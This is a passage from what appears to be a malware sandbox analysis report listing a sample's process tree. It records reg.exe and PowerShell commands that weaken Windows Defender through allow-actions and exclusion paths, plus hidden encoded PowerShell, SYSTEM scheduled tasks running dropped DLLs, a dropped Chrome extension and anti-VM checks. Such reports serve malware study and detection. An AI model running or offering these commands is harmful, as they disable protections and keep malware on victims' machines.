"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:3140

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:3812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:5460

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:2100

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:5180

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:5848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:5664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:5948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:5756

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:5964

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:244

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:5284

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:3156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:5728

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:5468

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:3124

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:1116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BcCQMXwjU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BcCQMXwjU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ITFcQRBGgRUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ITFcQRBGgRUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SwHdQyPSnQdU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SwHdQyPSnQdU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mfOEuGwqkLFbC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mfOEuGwqkLFbC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UakFvFPMbXVAWgVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UakFvFPMbXVAWgVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QomKEDtaZauBMonw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QomKEDtaZauBMonw\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6004

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcCQMXwjU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5656

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcCQMXwjU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1348

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BcCQMXwjU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3384

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ITFcQRBGgRUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5316

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ITFcQRBGgRUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4808

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SwHdQyPSnQdU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2536

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SwHdQyPSnQdU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2476

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mfOEuGwqkLFbC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3568

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mfOEuGwqkLFbC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1776

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UakFvFPMbXVAWgVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:1536

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UakFvFPMbXVAWgVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:2540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5204

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2604

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1648

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa /t REG_DWORD /d 0 /reg:32
3⤵
PID:5812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa /t REG_DWORD /d 0 /reg:64
3⤵
PID:4972

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QomKEDtaZauBMonw /t REG_DWORD /d 0 /reg:32
3⤵
PID:5152

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QomKEDtaZauBMonw /t REG_DWORD /d 0 /reg:64
3⤵
PID:5300

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ggjSpwyIb" /SC once /ST 05:01:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:4436

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ggjSpwyIb"
2⤵
PID:1164

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ggjSpwyIb"
2⤵
PID:4912

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MVZgvzYKAFemhQpXL" /SC once /ST 17:09:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QomKEDtaZauBMonw\fdsKOKogfpICasy\WhLgyvu.exe\" XP /PSsite_idjNO 525403 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2180

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "MVZgvzYKAFemhQpXL"
2⤵
PID:5204

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1904

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:244

C:\Windows\System32\DataExchangeHost.exe
C:\Windows\System32\DataExchangeHost.exe -Embedding
1⤵
PID:5156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3156

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7fff799eab58,0x7fff799eab68,0x7fff799eab78
2⤵
PID:5584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1664 --field-trial-handle=1588,i,8019009614270428852,17799635033298928662,131072 /prefetch:2
2⤵
PID:4076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1588,i,8019009614270428852,17799635033298928662,131072 /prefetch:8
2⤵
PID:2784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2196 --field-trial-handle=1588,i,8019009614270428852,17799635033298928662,131072 /prefetch:8
2⤵
PID:5924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2968 --field-trial-handle=1588,i,8019009614270428852,17799635033298928662,131072 /prefetch:1
2⤵
PID:4340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3236 --field-trial-handle=1588,i,8019009614270428852,17799635033298928662,131072 /prefetch:1
2⤵
PID:5196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4092 --field-trial-handle=1588,i,8019009614270428852,17799635033298928662,131072 /prefetch:1
2⤵
PID:5576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4284 --field-trial-handle=1588,i,8019009614270428852,17799635033298928662,131072 /prefetch:8
2⤵
PID:5612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4440 --field-trial-handle=1588,i,8019009614270428852,17799635033298928662,131072 /prefetch:8
2⤵
PID:6052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4584 --field-trial-handle=1588,i,8019009614270428852,17799635033298928662,131072 /prefetch:1
2⤵
PID:2332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4724 --field-trial-handle=1588,i,8019009614270428852,17799635033298928662,131072 /prefetch:8
2⤵
PID:4984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4900 --field-trial-handle=1588,i,8019009614270428852,17799635033298928662,131072 /prefetch:8
2⤵
PID:5752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4948 --field-trial-handle=1588,i,8019009614270428852,17799635033298928662,131072 /prefetch:8
2⤵
PID:2328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4828 --field-trial-handle=1588,i,8019009614270428852,17799635033298928662,131072 /prefetch:8
2⤵
PID:4236

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
2⤵
PID:1984

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff65e52ae48,0x7ff65e52ae58,0x7ff65e52ae68
3⤵
PID:1904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4936 --field-trial-handle=1588,i,8019009614270428852,17799635033298928662,131072 /prefetch:8
2⤵
PID:3588

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3940

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:6064

C:\Windows\Temp\QomKEDtaZauBMonw\fdsKOKogfpICasy\WhLgyvu.exe
C:\Windows\Temp\QomKEDtaZauBMonw\fdsKOKogfpICasy\WhLgyvu.exe XP /PSsite_idjNO 525403 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
PID:1748

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bXvtwaJkKQEzfXjvnG"
2⤵
PID:888

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5612

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
2⤵
PID:5028

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
3⤵
PID:3720

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
4⤵
PID:4428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5644

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
6⤵
PID:5852

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BcCQMXwjU\SQylrR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "fjXiyaIJtNnEyln" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4592

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "fjXiyaIJtNnEyln2" /F /xml "C:\Program Files (x86)\BcCQMXwjU\fucXyMe.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1636

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "fjXiyaIJtNnEyln"
2⤵
PID:2744

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2540

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "fjXiyaIJtNnEyln"
2⤵
PID:5456

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "IqaVnllQPEviET" /F /xml "C:\Program Files (x86)\SwHdQyPSnQdU2\kKfseWG.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3192

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "JGPIZArYwJUkk2" /F /xml "C:\ProgramData\UakFvFPMbXVAWgVB\uAjMdYh.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:5616

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZsHeBHvvmLjUCPViS2" /F /xml "C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\DOcLAqV.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3140

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MjkxzwBObpHYXaFcLDg2" /F /xml "C:\Program Files (x86)\mfOEuGwqkLFbC\wIcRuyB.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:828

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "xxPoWeVRQBzFwCLPV" /SC once /ST 17:00:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QomKEDtaZauBMonw\DQXkPdjL\WDpvYLh.dll\",#1 /bKsite_idoTM 525403" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3384

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "xxPoWeVRQBzFwCLPV"
2⤵
PID:3452

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "IPsFY1" /SC once /ST 07:10:51 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"
2⤵
- Creates scheduled task(s)
PID:5940

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "IPsFY1"
2⤵
PID:3288

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "IPsFY1"
2⤵
PID:3752

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MVZgvzYKAFemhQpXL"
2⤵
PID:2776

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1460

C:\Windows\system32\rundll32.EXE
